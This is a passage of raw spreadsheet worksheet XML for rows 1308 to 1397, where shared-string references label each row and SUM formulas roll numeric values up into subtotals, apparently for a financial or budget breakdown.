      <c r="A1308" s="10"/>
      <c r="B1308" s="10"/>
      <c r="C1308" s="28"/>
      <c r="D1308" s="10" t="s">
        <v>6021</v>
      </c>
      <c r="E1308" s="16" t="s">
        <v>4012</v>
      </c>
      <c r="F1308" s="17">
        <v>29</v>
      </c>
    </row>
    <row r="1309" spans="1:6">
      <c r="A1309" s="10"/>
      <c r="B1309" s="10"/>
      <c r="C1309" s="28"/>
      <c r="D1309" s="10" t="s">
        <v>6022</v>
      </c>
      <c r="E1309" s="16" t="s">
        <v>4013</v>
      </c>
      <c r="F1309" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1310" spans="1:6">
      <c r="A1310" s="10"/>
      <c r="B1310" s="10"/>
      <c r="C1310" s="28"/>
      <c r="D1310" s="10" t="s">
        <v>6023</v>
      </c>
      <c r="E1310" s="16" t="s">
        <v>4014</v>
      </c>
      <c r="F1310" s="17">
        <v>158</v>
      </c>
    </row>
    <row r="1311" spans="1:6">
      <c r="A1311" s="10"/>
      <c r="B1311" s="10"/>
      <c r="C1311" s="28"/>
      <c r="D1311" s="10" t="s">
        <v>6024</v>
      </c>
      <c r="E1311" s="11" t="s">
        <v>4015</v>
      </c>
      <c r="F1311" s="12">
        <f>F1312</f>
        <v>0</v>
      </c>
    </row>
    <row r="1312" spans="1:6">
      <c r="A1312" s="10"/>
      <c r="B1312" s="10"/>
      <c r="C1312" s="28"/>
      <c r="D1312" s="10" t="s">
        <v>6025</v>
      </c>
      <c r="E1312" s="16" t="s">
        <v>4016</v>
      </c>
      <c r="F1312" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1313" spans="1:6">
      <c r="A1313" s="10"/>
      <c r="B1313" s="10"/>
      <c r="C1313" s="28"/>
      <c r="D1313" s="10" t="s">
        <v>6026</v>
      </c>
      <c r="E1313" s="11" t="s">
        <v>4017</v>
      </c>
      <c r="F1313" s="14">
        <f>F1314</f>
        <v>3770</v>
      </c>
    </row>
    <row r="1314" spans="1:6">
      <c r="A1314" s="10"/>
      <c r="B1314" s="10"/>
      <c r="C1314" s="28"/>
      <c r="D1314" s="10" t="s">
        <v>6027</v>
      </c>
      <c r="E1314" s="11" t="s">
        <v>3879</v>
      </c>
      <c r="F1314" s="12">
        <f>F1315</f>
        <v>3770</v>
      </c>
    </row>
    <row r="1315" spans="1:6">
      <c r="A1315" s="10"/>
      <c r="B1315" s="10"/>
      <c r="C1315" s="31"/>
      <c r="D1315" s="10" t="s">
        <v>6028</v>
      </c>
      <c r="E1315" s="16" t="s">
        <v>2933</v>
      </c>
      <c r="F1315" s="17">
        <v>3770</v>
      </c>
    </row>
    <row r="1316" spans="1:6">
      <c r="A1316" s="10"/>
      <c r="B1316" s="10"/>
      <c r="C1316" s="28"/>
      <c r="D1316" s="10" t="s">
        <v>6029</v>
      </c>
      <c r="E1316" s="11" t="s">
        <v>4018</v>
      </c>
      <c r="F1316" s="12">
        <f>SUM(F1317:F1319)</f>
        <v>5078</v>
      </c>
    </row>
    <row r="1317" spans="1:6">
      <c r="A1317" s="10"/>
      <c r="B1317" s="10"/>
      <c r="C1317" s="28"/>
      <c r="D1317" s="10" t="s">
        <v>6030</v>
      </c>
      <c r="E1317" s="11" t="s">
        <v>4019</v>
      </c>
      <c r="F1317" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1318" spans="1:6">
      <c r="A1318" s="10"/>
      <c r="B1318" s="10"/>
      <c r="C1318" s="28"/>
      <c r="D1318" s="10" t="s">
        <v>6031</v>
      </c>
      <c r="E1318" s="11" t="s">
        <v>4020</v>
      </c>
      <c r="F1318" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1319" spans="1:6">
      <c r="A1319" s="10"/>
      <c r="B1319" s="10"/>
      <c r="C1319" s="28"/>
      <c r="D1319" s="10" t="s">
        <v>6032</v>
      </c>
      <c r="E1319" s="11" t="s">
        <v>4021</v>
      </c>
      <c r="F1319" s="12">
        <f>SUM(F1320:F1323)</f>
        <v>5078</v>
      </c>
    </row>
    <row r="1320" spans="1:6">
      <c r="A1320" s="10"/>
      <c r="B1320" s="10"/>
      <c r="C1320" s="28"/>
      <c r="D1320" s="10" t="s">
        <v>6033</v>
      </c>
      <c r="E1320" s="16" t="s">
        <v>4022</v>
      </c>
      <c r="F1320" s="17">
        <v>5078</v>
      </c>
    </row>
    <row r="1321" spans="1:6">
      <c r="A1321" s="10"/>
      <c r="B1321" s="10"/>
      <c r="C1321" s="28"/>
      <c r="D1321" s="10" t="s">
        <v>6034</v>
      </c>
      <c r="E1321" s="16" t="s">
        <v>4023</v>
      </c>
      <c r="F1321" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1322" spans="1:6">
      <c r="A1322" s="10"/>
      <c r="B1322" s="10"/>
      <c r="C1322" s="28"/>
      <c r="D1322" s="10" t="s">
        <v>6035</v>
      </c>
      <c r="E1322" s="16" t="s">
        <v>4024</v>
      </c>
      <c r="F1322" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1323" spans="1:6">
      <c r="A1323" s="10"/>
      <c r="B1323" s="10"/>
      <c r="C1323" s="28"/>
      <c r="D1323" s="10" t="s">
        <v>6036</v>
      </c>
      <c r="E1323" s="16" t="s">
        <v>4025</v>
      </c>
      <c r="F1323" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1324" spans="1:6">
      <c r="A1324" s="10"/>
      <c r="B1324" s="10"/>
      <c r="C1324" s="28"/>
      <c r="D1324" s="10" t="s">
        <v>6037</v>
      </c>
      <c r="E1324" s="11" t="s">
        <v>4026</v>
      </c>
      <c r="F1324" s="12">
        <f>SUM(F1325:F1327)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1325" spans="1:6">
      <c r="A1325" s="10"/>
      <c r="B1325" s="10"/>
      <c r="C1325" s="28"/>
      <c r="D1325" s="10" t="s">
        <v>6038</v>
      </c>
      <c r="E1325" s="11" t="s">
        <v>4027</v>
      </c>
      <c r="F1325" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1326" spans="1:6">
      <c r="A1326" s="10"/>
      <c r="B1326" s="10"/>
      <c r="C1326" s="34"/>
      <c r="D1326" s="10" t="s">
        <v>6039</v>
      </c>
      <c r="E1326" s="11" t="s">
        <v>4028</v>
      </c>
      <c r="F1326" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1327" spans="1:6">
      <c r="A1327" s="10"/>
      <c r="B1327" s="10"/>
      <c r="C1327" s="34"/>
      <c r="D1327" s="10" t="s">
        <v>6040</v>
      </c>
      <c r="E1327" s="11" t="s">
        <v>4029</v>
      </c>
      <c r="F1327" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1328" spans="1:6">
      <c r="A1328" s="10"/>
      <c r="B1328" s="10"/>
      <c r="C1328" s="34"/>
      <c r="D1328" s="7"/>
      <c r="E1328" s="35"/>
      <c r="F1328" s="36"/>
    </row>
    <row r="1329" spans="1:6">
      <c r="A1329" s="10"/>
      <c r="B1329" s="10"/>
      <c r="C1329" s="34"/>
      <c r="D1329" s="10"/>
      <c r="E1329" s="11" t="s">
        <v>4030</v>
      </c>
      <c r="F1329" s="12">
        <f>F1330+F1338+F1354+F1366+F1377+F1432+F1456+F1508+F1513+F1516+F1542+F1560+F1578</f>
        <v>244579</v>
      </c>
    </row>
    <row r="1330" spans="1:6">
      <c r="A1330" s="10"/>
      <c r="B1330" s="10"/>
      <c r="C1330" s="34"/>
      <c r="D1330" s="10" t="s">
        <v>5124</v>
      </c>
      <c r="E1330" s="11" t="s">
        <v>3229</v>
      </c>
      <c r="F1330" s="12">
        <f>F1331</f>
        <v>0</v>
      </c>
    </row>
    <row r="1331" spans="1:6">
      <c r="A1331" s="10"/>
      <c r="B1331" s="10"/>
      <c r="C1331" s="34"/>
      <c r="D1331" s="10" t="s">
        <v>6041</v>
      </c>
      <c r="E1331" s="11" t="s">
        <v>4031</v>
      </c>
      <c r="F1331" s="12">
        <f>SUM(F1332:F1337)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1332" spans="1:6">
      <c r="A1332" s="10"/>
      <c r="B1332" s="10"/>
      <c r="C1332" s="34"/>
      <c r="D1332" s="10" t="s">
        <v>6042</v>
      </c>
      <c r="E1332" s="16" t="s">
        <v>4032</v>
      </c>
      <c r="F1332" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1333" spans="1:6">
      <c r="A1333" s="10"/>
      <c r="B1333" s="10"/>
      <c r="C1333" s="34"/>
      <c r="D1333" s="10" t="s">
        <v>6043</v>
      </c>
      <c r="E1333" s="16" t="s">
        <v>4033</v>
      </c>
      <c r="F1333" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1334" spans="1:6">
      <c r="A1334" s="10"/>
      <c r="B1334" s="10"/>
      <c r="C1334" s="34"/>
      <c r="D1334" s="10" t="s">
        <v>6044</v>
      </c>
      <c r="E1334" s="16" t="s">
        <v>4034</v>
      </c>
      <c r="F1334" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1335" spans="1:6">
      <c r="A1335" s="10"/>
      <c r="B1335" s="10"/>
      <c r="C1335" s="34"/>
      <c r="D1335" s="10" t="s">
        <v>6045</v>
      </c>
      <c r="E1335" s="16" t="s">
        <v>4035</v>
      </c>
      <c r="F1335" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1336" spans="1:6">
      <c r="A1336" s="10"/>
      <c r="B1336" s="10"/>
      <c r="C1336" s="34"/>
      <c r="D1336" s="10" t="s">
        <v>6046</v>
      </c>
      <c r="E1336" s="16" t="s">
        <v>4036</v>
      </c>
      <c r="F1336" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1337" spans="1:6">
      <c r="A1337" s="10"/>
      <c r="B1337" s="10"/>
      <c r="C1337" s="34"/>
      <c r="D1337" s="10" t="s">
        <v>6047</v>
      </c>
      <c r="E1337" s="16" t="s">
        <v>4037</v>
      </c>
      <c r="F1337" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1338" spans="1:6">
      <c r="A1338" s="10"/>
      <c r="B1338" s="10"/>
      <c r="C1338" s="34"/>
      <c r="D1338" s="10" t="s">
        <v>5205</v>
      </c>
      <c r="E1338" s="11" t="s">
        <v>3328</v>
      </c>
      <c r="F1338" s="12">
        <f>F1339+F1345+F1351</f>
        <v>34</v>
      </c>
    </row>
    <row r="1339" spans="1:6">
      <c r="A1339" s="10"/>
      <c r="B1339" s="10"/>
      <c r="C1339" s="34"/>
      <c r="D1339" s="10" t="s">
        <v>6048</v>
      </c>
      <c r="E1339" s="11" t="s">
        <v>754</v>
      </c>
      <c r="F1339" s="12">
        <f>SUM(F1340:F1344)</f>
        <v>6</v>
      </c>
    </row>
    <row r="1340" spans="1:6">
      <c r="A1340" s="10"/>
      <c r="B1340" s="10"/>
      <c r="C1340" s="34"/>
      <c r="D1340" s="10" t="s">
        <v>6049</v>
      </c>
      <c r="E1340" s="16" t="s">
        <v>4038</v>
      </c>
      <c r="F1340" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1341" spans="1:6">
      <c r="A1341" s="10"/>
      <c r="B1341" s="10"/>
      <c r="C1341" s="34"/>
      <c r="D1341" s="10" t="s">
        <v>6050</v>
      </c>
      <c r="E1341" s="16" t="s">
        <v>4039</v>
      </c>
      <c r="F1341" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1342" spans="1:6">
      <c r="A1342" s="10"/>
      <c r="B1342" s="10"/>
      <c r="C1342" s="34"/>
      <c r="D1342" s="10" t="s">
        <v>6051</v>
      </c>
      <c r="E1342" s="16" t="s">
        <v>4040</v>
      </c>
      <c r="F1342" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1343" spans="1:6">
      <c r="A1343" s="10"/>
      <c r="B1343" s="10"/>
      <c r="C1343" s="34"/>
      <c r="D1343" s="10" t="s">
        <v>6052</v>
      </c>
      <c r="E1343" s="16" t="s">
        <v>4041</v>
      </c>
      <c r="F1343" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1344" spans="1:6">
      <c r="A1344" s="10"/>
      <c r="B1344" s="10"/>
      <c r="C1344" s="34"/>
      <c r="D1344" s="10" t="s">
        <v>6053</v>
      </c>
      <c r="E1344" s="16" t="s">
        <v>4042</v>
      </c>
      <c r="F1344" s="17">
        <v>6</v>
      </c>
    </row>
    <row r="1345" spans="1:6">
      <c r="A1345" s="10"/>
      <c r="B1345" s="10"/>
      <c r="C1345" s="34"/>
      <c r="D1345" s="10" t="s">
        <v>6054</v>
      </c>
      <c r="E1345" s="11" t="s">
        <v>755</v>
      </c>
      <c r="F1345" s="12">
        <f>SUM(F1346:F1350)</f>
        <v>28</v>
      </c>
    </row>
    <row r="1346" spans="1:6">
      <c r="A1346" s="10"/>
      <c r="B1346" s="10"/>
      <c r="C1346" s="34"/>
      <c r="D1346" s="10" t="s">
        <v>6055</v>
      </c>
      <c r="E1346" s="16" t="s">
        <v>4043</v>
      </c>
      <c r="F1346" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1347" spans="1:6">
      <c r="A1347" s="10"/>
      <c r="B1347" s="10"/>
      <c r="C1347" s="34"/>
      <c r="D1347" s="10" t="s">
        <v>6056</v>
      </c>
      <c r="E1347" s="16" t="s">
        <v>4044</v>
      </c>
      <c r="F1347" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1348" spans="1:6">
      <c r="A1348" s="10"/>
      <c r="B1348" s="10"/>
      <c r="C1348" s="34"/>
      <c r="D1348" s="10" t="s">
        <v>6057</v>
      </c>
      <c r="E1348" s="16" t="s">
        <v>4045</v>
      </c>
      <c r="F1348" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1349" spans="1:6">
      <c r="A1349" s="10"/>
      <c r="B1349" s="10"/>
      <c r="C1349" s="34"/>
      <c r="D1349" s="10" t="s">
        <v>6058</v>
      </c>
      <c r="E1349" s="16" t="s">
        <v>4046</v>
      </c>
      <c r="F1349" s="17">
        <v>28</v>
      </c>
    </row>
    <row r="1350" spans="1:6">
      <c r="A1350" s="10"/>
      <c r="B1350" s="10"/>
      <c r="C1350" s="34"/>
      <c r="D1350" s="10" t="s">
        <v>6059</v>
      </c>
      <c r="E1350" s="16" t="s">
        <v>4047</v>
      </c>
      <c r="F1350" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1351" spans="1:6">
      <c r="A1351" s="10"/>
      <c r="B1351" s="10"/>
      <c r="C1351" s="34"/>
      <c r="D1351" s="10" t="s">
        <v>6060</v>
      </c>
      <c r="E1351" s="11" t="s">
        <v>756</v>
      </c>
      <c r="F1351" s="12">
        <f>SUM(F1352:F1353)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1352" spans="1:6">
      <c r="A1352" s="10"/>
      <c r="B1352" s="10"/>
      <c r="C1352" s="34"/>
      <c r="D1352" s="10" t="s">
        <v>6061</v>
      </c>
      <c r="E1352" s="16" t="s">
        <v>4048</v>
      </c>
      <c r="F1352" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1353" spans="1:6">
      <c r="A1353" s="10"/>
      <c r="B1353" s="10"/>
      <c r="C1353" s="34"/>
      <c r="D1353" s="10" t="s">
        <v>6062</v>
      </c>
      <c r="E1353" s="16" t="s">
        <v>4049</v>
      </c>
      <c r="F1353" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1354" spans="1:6">
      <c r="A1354" s="10"/>
      <c r="B1354" s="10"/>
      <c r="C1354" s="34"/>
      <c r="D1354" s="10" t="s">
        <v>5262</v>
      </c>
      <c r="E1354" s="11" t="s">
        <v>3376</v>
      </c>
      <c r="F1354" s="12">
        <f>F1355+F1359+F1363</f>
        <v>2130</v>
      </c>
    </row>
    <row r="1355" spans="1:6">
      <c r="A1355" s="10"/>
      <c r="B1355" s="10"/>
      <c r="C1355" s="34"/>
      <c r="D1355" s="10" t="s">
        <v>6063</v>
      </c>
      <c r="E1355" s="11" t="s">
        <v>4050</v>
      </c>
      <c r="F1355" s="12">
        <f>SUM(F1356:F1358)</f>
        <v>2130</v>
      </c>
    </row>
    <row r="1356" spans="1:6">
      <c r="A1356" s="10"/>
      <c r="B1356" s="10"/>
      <c r="C1356" s="34"/>
      <c r="D1356" s="10" t="s">
        <v>6064</v>
      </c>
      <c r="E1356" s="16" t="s">
        <v>4051</v>
      </c>
      <c r="F1356" s="17">
        <v>42</v>
      </c>
    </row>
    <row r="1357" spans="1:6">
      <c r="A1357" s="10"/>
      <c r="B1357" s="10"/>
      <c r="C1357" s="34"/>
      <c r="D1357" s="10" t="s">
        <v>6065</v>
      </c>
      <c r="E1357" s="16" t="s">
        <v>4052</v>
      </c>
      <c r="F1357" s="17">
        <v>2088</v>
      </c>
    </row>
    <row r="1358" spans="1:6">
      <c r="A1358" s="10"/>
      <c r="B1358" s="10"/>
      <c r="C1358" s="34"/>
      <c r="D1358" s="10" t="s">
        <v>6066</v>
      </c>
      <c r="E1358" s="16" t="s">
        <v>4053</v>
      </c>
      <c r="F1358" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1359" spans="1:6">
      <c r="A1359" s="10"/>
      <c r="B1359" s="10"/>
      <c r="C1359" s="34"/>
      <c r="D1359" s="10" t="s">
        <v>6067</v>
      </c>
      <c r="E1359" s="11" t="s">
        <v>4054</v>
      </c>
      <c r="F1359" s="12">
        <f>SUM(F1360:F1362)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1360" spans="1:6">
      <c r="A1360" s="10"/>
      <c r="B1360" s="10"/>
      <c r="C1360" s="34"/>
      <c r="D1360" s="10" t="s">
        <v>6068</v>
      </c>
      <c r="E1360" s="16" t="s">
        <v>4051</v>
      </c>
      <c r="F1360" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1361" spans="1:6">
      <c r="A1361" s="10"/>
      <c r="B1361" s="10"/>
      <c r="C1361" s="37"/>
      <c r="D1361" s="10" t="s">
        <v>6069</v>
      </c>
      <c r="E1361" s="16" t="s">
        <v>4052</v>
      </c>
      <c r="F1361" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1362" spans="1:6">
      <c r="A1362" s="10"/>
      <c r="B1362" s="10"/>
      <c r="C1362" s="34"/>
      <c r="D1362" s="10" t="s">
        <v>6070</v>
      </c>
      <c r="E1362" s="16" t="s">
        <v>4055</v>
      </c>
      <c r="F1362" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1363" spans="1:6">
      <c r="A1363" s="10"/>
      <c r="B1363" s="10"/>
      <c r="C1363" s="34"/>
      <c r="D1363" s="10" t="s">
        <v>6071</v>
      </c>
      <c r="E1363" s="11" t="s">
        <v>4056</v>
      </c>
      <c r="F1363" s="12">
        <f>SUM(F1364:F1365)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1364" spans="1:6">
      <c r="A1364" s="10"/>
      <c r="B1364" s="10"/>
      <c r="C1364" s="34"/>
      <c r="D1364" s="10" t="s">
        <v>6072</v>
      </c>
      <c r="E1364" s="16" t="s">
        <v>4052</v>
      </c>
      <c r="F1364" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1365" spans="1:6">
      <c r="A1365" s="10"/>
      <c r="B1365" s="10"/>
      <c r="C1365" s="34"/>
      <c r="D1365" s="10" t="s">
        <v>6073</v>
      </c>
      <c r="E1365" s="16" t="s">
        <v>4057</v>
      </c>
      <c r="F1365" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1366" spans="1:6">
      <c r="A1366" s="10"/>
      <c r="B1366" s="10"/>
      <c r="C1366" s="34"/>
      <c r="D1366" s="10" t="s">
        <v>5460</v>
      </c>
      <c r="E1366" s="11" t="s">
        <v>3548</v>
      </c>
      <c r="F1366" s="12">
        <f>F1367+F1372</f>
        <v>0</v>
      </c>
    </row>
    <row r="1367" spans="1:6">
      <c r="A1367" s="10"/>
      <c r="B1367" s="10"/>
      <c r="C1367" s="34"/>
      <c r="D1367" s="10" t="s">
        <v>6074</v>
      </c>
      <c r="E1367" s="11" t="s">
        <v>758</v>
      </c>
      <c r="F1367" s="12">
        <f>SUM(F1368:F1371)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1368" spans="1:6">
      <c r="A1368" s="10"/>
      <c r="B1368" s="10"/>
      <c r="C1368" s="34"/>
      <c r="D1368" s="10" t="s">
        <v>6075</v>
      </c>
      <c r="E1368" s="16" t="s">
        <v>4058</v>
      </c>
      <c r="F1368" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1369" spans="1:6">
      <c r="A1369" s="10"/>
      <c r="B1369" s="10"/>
      <c r="C1369" s="34"/>
      <c r="D1369" s="10" t="s">
        <v>6076</v>
      </c>
      <c r="E1369" s="16" t="s">
        <v>4059</v>
      </c>
      <c r="F1369" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1370" spans="1:6">
      <c r="A1370" s="10"/>
      <c r="B1370" s="10"/>
      <c r="C1370" s="34"/>
      <c r="D1370" s="10" t="s">
        <v>6077</v>
      </c>
      <c r="E1370" s="16" t="s">
        <v>4060</v>
      </c>
      <c r="F1370" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1371" spans="1:6">
      <c r="A1371" s="10"/>
      <c r="B1371" s="10"/>
      <c r="C1371" s="34"/>
      <c r="D1371" s="10" t="s">
        <v>6078</v>
      </c>
      <c r="E1371" s="16" t="s">
        <v>4061</v>
      </c>
      <c r="F1371" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1372" spans="1:6">
      <c r="A1372" s="10"/>
      <c r="B1372" s="10"/>
      <c r="C1372" s="34"/>
      <c r="D1372" s="10" t="s">
        <v>6079</v>
      </c>
      <c r="E1372" s="11" t="s">
        <v>759</v>
      </c>
      <c r="F1372" s="12">
        <f>SUM(F1373:F1376)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1373" spans="1:6">
      <c r="A1373" s="10"/>
      <c r="B1373" s="10"/>
      <c r="C1373" s="34"/>
      <c r="D1373" s="10" t="s">
        <v>6080</v>
      </c>
      <c r="E1373" s="16" t="s">
        <v>4062</v>
      </c>
      <c r="F1373" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1374" spans="1:6">
      <c r="A1374" s="10"/>
      <c r="B1374" s="10"/>
      <c r="C1374" s="34"/>
      <c r="D1374" s="10" t="s">
        <v>6081</v>
      </c>
      <c r="E1374" s="16" t="s">
        <v>4063</v>
      </c>
      <c r="F1374" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1375" spans="1:6">
      <c r="A1375" s="10"/>
      <c r="B1375" s="10"/>
      <c r="C1375" s="34"/>
      <c r="D1375" s="10" t="s">
        <v>6082</v>
      </c>
      <c r="E1375" s="16" t="s">
        <v>4064</v>
      </c>
      <c r="F1375" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1376" spans="1:6">
      <c r="A1376" s="10"/>
      <c r="B1376" s="10"/>
      <c r="C1376" s="34"/>
      <c r="D1376" s="10" t="s">
        <v>6083</v>
      </c>
      <c r="E1376" s="16" t="s">
        <v>4065</v>
      </c>
      <c r="F1376" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1377" spans="1:6">
      <c r="A1377" s="10"/>
      <c r="B1377" s="10"/>
      <c r="C1377" s="34"/>
      <c r="D1377" s="10" t="s">
        <v>5539</v>
      </c>
      <c r="E1377" s="11" t="s">
        <v>3619</v>
      </c>
      <c r="F1377" s="12">
        <f>F1378+F1391+F1395+F1396+F1402+F1406+F1410+F1414+F1420+F1423</f>
        <v>231877</v>
      </c>
    </row>
    <row r="1378" spans="1:6">
      <c r="A1378" s="10"/>
      <c r="B1378" s="10"/>
      <c r="C1378" s="34"/>
      <c r="D1378" s="10" t="s">
        <v>6084</v>
      </c>
      <c r="E1378" s="11" t="s">
        <v>761</v>
      </c>
      <c r="F1378" s="12">
        <f>SUM(F1379:F1390)</f>
        <v>142794</v>
      </c>
    </row>
    <row r="1379" spans="1:6">
      <c r="A1379" s="10"/>
      <c r="B1379" s="10"/>
      <c r="C1379" s="34"/>
      <c r="D1379" s="10" t="s">
        <v>6085</v>
      </c>
      <c r="E1379" s="16" t="s">
        <v>4066</v>
      </c>
      <c r="F1379" s="17">
        <v>14307</v>
      </c>
    </row>
    <row r="1380" spans="1:6">
      <c r="A1380" s="10"/>
      <c r="B1380" s="10"/>
      <c r="C1380" s="34"/>
      <c r="D1380" s="10" t="s">
        <v>6086</v>
      </c>
      <c r="E1380" s="16" t="s">
        <v>4067</v>
      </c>
      <c r="F1380" s="17">
        <v>1500</v>
      </c>
    </row>
    <row r="1381" spans="1:6">
      <c r="A1381" s="10"/>
      <c r="B1381" s="10"/>
      <c r="C1381" s="34"/>
      <c r="D1381" s="10" t="s">
        <v>6087</v>
      </c>
      <c r="E1381" s="16" t="s">
        <v>4068</v>
      </c>
      <c r="F1381" s="17">
        <v>7521</v>
      </c>
    </row>
    <row r="1382" spans="1:6">
      <c r="A1382" s="10"/>
      <c r="B1382" s="10"/>
      <c r="C1382" s="34"/>
      <c r="D1382" s="10" t="s">
        <v>6088</v>
      </c>
      <c r="E1382" s="16" t="s">
        <v>4069</v>
      </c>
      <c r="F1382" s="17">
        <v>15591</v>
      </c>
    </row>
    <row r="1383" spans="1:6">
      <c r="A1383" s="10"/>
      <c r="B1383" s="10"/>
      <c r="C1383" s="34"/>
      <c r="D1383" s="10" t="s">
        <v>6089</v>
      </c>
      <c r="E1383" s="16" t="s">
        <v>4070</v>
      </c>
      <c r="F1383" s="17">
        <v>885</v>
      </c>
    </row>
    <row r="1384" spans="1:6">
      <c r="A1384" s="10"/>
      <c r="B1384" s="10"/>
      <c r="C1384" s="34"/>
      <c r="D1384" s="10" t="s">
        <v>6090</v>
      </c>
      <c r="E1384" s="16" t="s">
        <v>4071</v>
      </c>
      <c r="F1384" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1385" spans="1:6">
      <c r="A1385" s="10"/>
      <c r="B1385" s="10"/>
      <c r="C1385" s="34"/>
      <c r="D1385" s="10" t="s">
        <v>6091</v>
      </c>
      <c r="E1385" s="16" t="s">
        <v>4072</v>
      </c>
      <c r="F1385" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1386" spans="1:6">
      <c r="A1386" s="10"/>
      <c r="B1386" s="10"/>
      <c r="C1386" s="34"/>
      <c r="D1386" s="10" t="s">
        <v>6092</v>
      </c>
      <c r="E1386" s="16" t="s">
        <v>4073</v>
      </c>
      <c r="F1386" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1387" spans="1:6">
      <c r="A1387" s="10"/>
      <c r="B1387" s="10"/>
      <c r="C1387" s="34"/>
      <c r="D1387" s="10" t="s">
        <v>6093</v>
      </c>
      <c r="E1387" s="16" t="s">
        <v>4074</v>
      </c>
      <c r="F1387" s="17">
        <v>26775</v>
      </c>
    </row>
    <row r="1388" spans="1:6">
      <c r="A1388" s="10"/>
      <c r="B1388" s="10"/>
      <c r="C1388" s="34"/>
      <c r="D1388" s="10" t="s">
        <v>6094</v>
      </c>
      <c r="E1388" s="16" t="s">
        <v>4075</v>
      </c>
      <c r="F1388" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1389" spans="1:6">
      <c r="A1389" s="10"/>
      <c r="B1389" s="10"/>
      <c r="C1389" s="34"/>
      <c r="D1389" s="10" t="s">
        <v>6095</v>
      </c>
      <c r="E1389" s="16" t="s">
        <v>3926</v>
      </c>
      <c r="F1389" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1390" spans="1:6">
      <c r="A1390" s="10"/>
      <c r="B1390" s="10"/>
      <c r="C1390" s="34"/>
      <c r="D1390" s="10" t="s">
        <v>6096</v>
      </c>
      <c r="E1390" s="16" t="s">
        <v>4076</v>
      </c>
      <c r="F1390" s="17">
        <v>76215</v>
      </c>
    </row>
    <row r="1391" spans="1:6">
      <c r="A1391" s="10"/>
      <c r="B1391" s="10"/>
      <c r="C1391" s="34"/>
      <c r="D1391" s="10" t="s">
        <v>6097</v>
      </c>
      <c r="E1391" s="11" t="s">
        <v>762</v>
      </c>
      <c r="F1391" s="12">
        <f>SUM(F1392:F1394)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1392" spans="1:6">
      <c r="A1392" s="10"/>
      <c r="B1392" s="10"/>
      <c r="C1392" s="34"/>
      <c r="D1392" s="10" t="s">
        <v>6098</v>
      </c>
      <c r="E1392" s="16" t="s">
        <v>4066</v>
      </c>
      <c r="F1392" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1393" spans="1:6">
      <c r="A1393" s="10"/>
      <c r="B1393" s="10"/>
      <c r="C1393" s="34"/>
      <c r="D1393" s="10" t="s">
        <v>6099</v>
      </c>
      <c r="E1393" s="16" t="s">
        <v>4067</v>
      </c>
      <c r="F1393" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1394" spans="1:6">
      <c r="A1394" s="10"/>
      <c r="B1394" s="10"/>
      <c r="C1394" s="34"/>
      <c r="D1394" s="10" t="s">
        <v>6100</v>
      </c>
      <c r="E1394" s="16" t="s">
        <v>4077</v>
      </c>
      <c r="F1394" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1395" spans="1:6">
      <c r="A1395" s="10"/>
      <c r="B1395" s="10"/>
      <c r="C1395" s="34"/>
      <c r="D1395" s="10" t="s">
        <v>6101</v>
      </c>
      <c r="E1395" s="11" t="s">
        <v>763</v>
      </c>
      <c r="F1395" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1396" spans="1:6">
      <c r="A1396" s="10"/>
      <c r="B1396" s="10"/>
      <c r="C1396" s="34"/>
      <c r="D1396" s="10" t="s">
        <v>6102</v>
      </c>
      <c r="E1396" s="11" t="s">
        <v>764</v>
      </c>
      <c r="F1396" s="12">
        <f>SUM(F1397:F1401)</f>
        <v>7860</v>
      </c>
    </row>
    <row r="1397" spans="1:6">
      <c r="A1397" s="10"/>
      <c r="B1397" s="10"/>
